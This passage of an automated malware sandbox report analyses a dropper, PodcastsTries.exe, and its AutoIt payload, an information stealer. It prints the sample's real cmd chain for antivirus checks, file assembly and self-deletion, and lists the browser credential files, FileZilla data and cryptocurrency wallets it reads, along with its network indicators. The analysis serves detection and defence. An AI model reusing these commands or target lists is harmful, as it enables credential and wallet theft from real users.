                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00155058 mov eax, dword ptr fs:[00000030h] 12_2_00155058
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_001920AA
                Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00162992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00162992
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00150BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00150BAF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00150D45 SetUnhandledExceptionFilter,12_2_00150D45
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00150F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00150F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00191B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00191B4D
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0013338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0013338B
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019BBED SendInput,keybd_event,12_2_0019BBED
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019EC6C mouse_event,12_2_0019EC6C
                Source: C:\Users\user\Desktop\PodcastsTries.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Memo
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "c:\program files (x86)\microsoft\edge\application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.winrtappidservice --lang=en-gb --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_001914AE
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00191FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00191FB0
                Source: Billion.com, 0000000C.00000000.2151331221.00000000001F3000.00000002.00000001.01000000.00000007.sdmp, Shipping.9.dr, Billion.com.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Billion.com Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00150A08 cpuid 12_2_00150A08
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0018E5F4 GetLocalTime,12_2_0018E5F4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0018E652 GetUserNameW,12_2_0018E652
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0016BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0016BCD2
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: info.seco
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: passphrase.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: MultiDoge
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: seed.seco
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Billion.comBinary or memory string: WIN_81
                Source: Billion.comBinary or memory string: WIN_XP
                Source: Billion.com | Binary or memory string: WIN_XPe
                Source: Billion.com | Binary or memory string: WIN_VISTA
                Source: Billion.com | Binary or memory string: WIN_7
                Source: Billion.com | Binary or memory string: WIN_8
                Source: Yara match | File source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3329936932.000000000446D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com | Code function: 12_2_001B2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_001B2263
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com | Code function: 12_2_001B1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_001B1C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 27 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 112 Process Injection | 111 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Valid Accounts | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph: ID 1580498, Sample: PodcastsTries.exe, Startdate: 24/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                PodcastsTries.exe | 11% | ReversingLabs
                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Temp\680662\Billion.com | 0% | ReversingLabs
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://publickeyservice.gcp.privacysandboxservices.com | 0% | Avira URL Cloud | safe
                http://anglebug.com/35867 | 0% | Avira URL Cloud | safe
                http://anglebug.com/6876F | 0% | Avira URL Cloud | safe
                http://anglebug.com/8229I | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bijutr.shop | 188.245.216.205 | true | true |  | unknown
                chrome.cloudflare-dns.com | 162.159.61.3 | true | false |  | high
                t.me | 149.154.167.99 | true | false |  | high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false |  | high
                sb.scorecardresearch.com | 18.161.69.30 | true | false |  | high
                www.google.com | 142.250.181.68 | true | false |  | high
                googlehosted.l.googleusercontent.com | 142.250.181.65 | true | false |  | high
                clients2.googleusercontent.com | unknown | unknown | false |  | high
                bzib.nelreports.net | unknown | unknown | false |  | high
                assets.msn.com | unknown | unknown | false |  | high
                c.msn.com | unknown | unknown | false |  | high
                ntp.msn.com | unknown | unknown | false |  | high
                api.msn.com | unknown | unknown | false |  | high
                NsxXzupCMoDsL.NsxXzupCMoDsL | unknown | unknown | false |  | unknown
                Name | Malicious | Antivirus Detection | Reputation
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921021&w=0&anoncknm=app_anon&NoResponseBody=true | false |  | high
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920167&w=0&anoncknm=app_anon&NoResponseBody=true | false |  | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                      high
